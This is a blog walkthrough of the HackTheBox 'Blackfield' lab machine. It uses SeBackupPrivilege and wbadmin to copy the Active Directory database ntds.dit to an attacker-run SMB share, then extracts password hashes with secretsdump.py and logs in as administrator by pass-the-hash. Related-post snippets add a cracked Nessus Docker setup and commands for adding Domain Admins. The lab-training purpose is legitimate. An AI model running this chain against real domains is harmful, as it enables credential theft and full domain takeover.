Skip to main content

part 1 - creating smb server on linux or unix in order to data exfiltration from other server | ntfs disk | dd command | extracting ntds.dit

the scenario is written while performing hackthebox blackfield box. 

after getting access on a system, see what privileges you have by running command whoami /all or whoami /priv

if you see sebackupprivilege and serestoreprivilege then you can proceed the below all steps. these two are most dangerous privileges specially when you are in AD. 

creating a share on 10.10.10.14 (our system) so that we can pull out some data from an AD that we compromised.

creating a smb server on the following directory /home/ippsec/blackfield/


mkdir smb
cd smb
sudo smbserver.py -smb2support SendMeYourData $(pwd)


or


sudo smbserver.py -smb2support -user ippsec -password PleaseSubscribe SendMeYourData $(pwd) 

The username and password is your own machine username and password.
SendMeYourData  is the share name.
once you give enter, it will start listening on 445

Now go to the AD where you get evil-winrm shell. scenario is you compromised the AD. now you want to exfiltrate c:\windows\ntds\ from AD to your own system.
you are connected with the AD using winrm shell. note: in win-rm shell we need to provide a hash of powerful user to get access on a system. and we provide svc_backup user hash. 


*Evil-WinRM* PS C:\Users\svc_backup\Documents> wbadmin start backup -backuptarget:\\10.10.10.14\SendMeYourData  -include:c:\windows\ntds\


or 


you can use this command as well if there is a authentication problem arise:


*Evil-WinRM* PS C:\Users\svc_backup\Documents> net use x: \\10.10.10.14\SendMeYourData /user:ippsec PleaseSubscribe


PleaseSubscribe is the password. 

  
when you run above command then the task will fail because the backup process will tell you do you want to start the back operation? type yes or no. as you are on the winrm shell so you dont have any further shell to type yes. so run the below command.

 
*Evil-WinRM* PS C:\Users\svc_backup\Documents> echo y | wbadmin start backup -backuptarget:\\10.10.10.14\SendMeYourData  -include:c:\windows\ntds\


but actually the above command will also not start backing up the data successfully because it needs the target volume should be formatted with NTFS/ReFS

Main task starts from here:


So lets create a ntfs file system. Creating ntfs file system on our machine (10.10.10.14). this ntfs file system we will be mounting.
Now to proceed further go to your own machine again:
ippsec@parrot$
we are going to create 2GB ntfs disk.


dd if=/dev/zero of=ntfs.disk bs=1024M count=2


sudo losetup -fP ntfs.disk


-f for --find-----> find first unused device and -P for --partscan---> create a partitioned loop device 


losetup -a 


/dev/loop0: /home/ippsec/htb/blackfield/ntfs.disk


now it is mounted on /dev/loop0


now do the following:


sudo mkfs.ntfs /dev/loop0

 
now it should make /dev/loop0 to ntfs file system.

 
sudo mount /dev/loop0 smb/  (mounting /dev/loop0 with /home/ippsec/htb/blackfield/smb/ directory that we had created sometimes ago) 


mount | grep smb


/dev/loop0 on /home/ippsec/htb/blackfield/smb

now lets run the impacket script again.
from your own machine where you setup smb server: 


sudo smbserver.py -smb2support -user ippsec -password PleaseSubscribe SendMeYourData $(pwd)

From AD:

*Evil-WinRM* PS C:\Users\svc_backup\Documents> echo y | wbadmin start backup -backuptarget:\\10.10.10.14\SendMeYourData  -include:c:\windows\ntds\

unfortunately this is gonna also fail because impacket does not handle the smb well.

 

ok now lets do actual smb configuration: from your host machine:


mkdir /home/ippsec/htb/blackfield/smb/ 


chmod 777 /home/ippsec/htb/blackfield/smb/ (optional)

 
sudo vi /etc/smb/samba.conf   (see 232 lines)


Path =  /home/ippsec/htb/blackfield/smb/$   (on parrot os, every line in configuration file ends with $ sign)
read only = no$
guest ok = yes$
 

sudo systemctl restart smbd

*Evil-WinRM* PS C:\Users\svc_backup\Documents> net use x: /delete  (if there is previous share mounted) 


*Evil-WinRM* PS C:\Users\svc_backup\Documents> net use x: \\10.10.10.14\SendMeYourData


now we have x: mounted.  lets try the wbadmin command again. 


*Evil-WinRM* PS C:\Users\svc_backup\Documents> echo y | wbadmin start backup -backuptarget:\\10.10.10.14\SendMeYourData  -include:c:\windows\ntds\
 

hopefully it will work now.

now go to your host machine:


ippsec@parrot$ cd /home/ippsec/htb/blackfield/smb/


watch -n 1 'ls -la'   


you probably see, WindowsImageBackup created. under that DC01 is created. under that .vhdx file is created. it will take some time to complete.

from the AD:

*Evil-WinRM* PS C:\Users\svc_backup\Documents> net use x: \\10.10.10.14\SendMeYourData  (mount the share to access from AD, already done this previously. before doing this please check again) 


*Evil-WinRM* PS C:\Users\svc_backup\Documents> x: or cd x:\
dir


once the backup is done, then run below command to get the version:



*Evil-WinRM* PS C:\Users\svc_backup\Documents> wbadmin get versions

note down the version which is

10/02/2020 -03:51

*Evil-WinRM* PS C:\Users\svc_backup\Documents> echo Y | wbadmin start recovery -version:10/02/2020 -03:51 -itemtype:file -items:C:\windows\ntds\ntds.dit -recoverytarget:C:\ -notrestoreacl

recovering ntds.dit file will take some time because it will fetch that from the backup that you had created. once done follow below steps.

*Evil-WinRM* PS C:\Users\svc_backup\Documents> cd \

dir

you should see ntds.dit file.   

now download the file:

*Evil-WinRM* PS C:\Users\svc_backup\Documents> download ntds.dit

ntds.dit will be saved on the directory of your own machine where you last stayed. say you stayed on /htb/blackfield/ directory on your own machine.

ntds.dit is your AD domain database and this DB is encrypted with a boot key. the boot key is located to hklm\system registry location.

*Evil-WinRM* PS C:\Users\svc_backup\Documents> reg save hklm\system system.hive

*Evil-WinRM* PS C:\Users\svc_backup\Documents> download system.hive (now also download the system.hive)

now go to your host/own machine to run secretsdump.py tool.

ippsec@parrot$

secretsdump.py -ntds ntds.dit -system system.hive LOCAL

secretsdump.py -ntds ntds.dit -system system.hive -history LOCAL

 

now you have the administrator hash. so from your host / own machine launch psexec.py

to access AD 10.10.10.192

ippsec@parrot$

psexec.py -hashes 184fb5e5178480be64824d4cd53b99ee:184fb5e5178480be64824d4cd53b99ee administrator@10.10.10.192

 you can do ntlm:ntlm or lm:ntlm

but lm hash portion is not used. psexec.py just want to see it.

now you should access C:\Windows\system32> whoami

nt authority\system

C:\Windows\system32> cd \Users\Administrator\Desktop

dir

type root.txt

see the part 2

Comments

Post a Comment

Popular posts from this blog

Install Nessus from docker

The below two commands you need to run first one by one:  docker run -itd --name=ramisec_nessus -p 8834:8834 ramisec/nessus docker exec -it ramisec_nessus /bin/bash /nessus/update.sh Username: admin And you need to change the password: #Enter the command line of the docker container docker exec -it ramisec_nessus bash #Execute the following commands in sequence # Enter this directory cd /opt/nessus/sbin # List logged in users ./nessuscli lsuser # Modify the password of the specified user (take admin as an example) ./nessuscli chpasswd admin After access to the nessus, make sure you turn off the automatic updates otherwise crack will not work after some time. Before any scan you need to run the update.sh command (shown above) to have the latest plugins. Now everytime your system reboots, your docker instance will be shutdown. You need to up it again manually. Here are the commands.  1. docker ps -a    Now note down the container id. 2. docker start <container id> C
Post a Comment
Read more

net command cheat sheet

  To see what users present in the system: net user To see local groups in the system: net localgroup To see domain groups. This should be run on a domain controller: net group To see the details of a user along with his/her group membership: net user mahim To see who are the members of a particular group (local machine): net localgroup "administrators"    (These are not case sensitive. You can use administrators or Administrators. Both will give you same result. To see who are the members of a particular group (domain machine): net group "domain admins" Create a local user: net user localuser1 MyP@ssw0rd /add Create a domain user: net user domainuser1 MyP@ssw0rd /add /domain Add the local user to local admin group: net localgroup Administrators localuser1 /add Add the user to domain admin group: net group "Domain Admins" domainuser1 /add /domain Avi
Post a Comment
Read more